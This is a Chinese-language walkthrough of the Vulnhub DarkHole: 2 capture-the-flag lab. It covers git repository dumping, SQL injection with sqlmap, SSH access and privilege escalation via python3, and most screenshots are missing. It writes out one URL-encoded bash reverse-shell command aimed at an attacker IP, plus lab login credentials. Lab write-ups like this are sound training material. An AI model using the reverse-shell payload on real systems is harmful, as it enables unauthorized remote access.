其他分享
首页 > 其他分享> > Vulnhub 靶场 DARKHOLE: 2

Vulnhub 靶场 DARKHOLE: 2

作者:互联网

Vulnhub 靶场 DARKHOLE: 2

一、前期准备

1.使用nmap对目标靶机进行扫描
image
发现开放了22和80端口,而且还有 Git repository。
2、80端口。
因为80端口有git仓库,那就把仓库转过来看看,使用git-dumper(从网站转储git存储库的工具。)
下载 git_dumper.py ,并赋权:
image
把目标靶机中的 git 仓库弄下来:
image
东西不少,找 log 看看:
image
看到login.php,访问试试。
image
需要邮箱和密码,看下缓存区:
image
发现了邮箱和密码,"lush@admin.com" - "321"。登陆一下:
image

二、漏洞利用

发现可能存在注入点,这里要加上cookie。
image
sqlmap跑一下。
image
发现了数据库,看一下 darkhole_2 库中的表:
image
查看ssh表中的数据。
image
发现账号密码,试着ssh登陆。
image
查看定时任务。
image
发现9999端口有一个服务。查看一下 /opt/web:
image
查看一下tcp进程。
image
发现在监听状态,尝试一下。
image
发现可以用,在cmd处写入shell,记得要 url 编码:

bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.147.190%2F1234%200%3E%261%27

image
攻击机监听1234端口,成功反弹shell,拿到losy用户。
image
查看了一番后,在家目录下的 .bash_history 文件中发现了 losy 的密码:
image

三、提权

在刚刚ssh登陆界面切换为losy用户。
image
发现 python3 随便用,那就简单了,直接用 python3 提权:
image

image

标签:发现,git,查看,losy,端口,DARKHOLE,Vulnhub,靶场,ssh
来源: https://www.cnblogs.com/2022zzt/p/16229091.html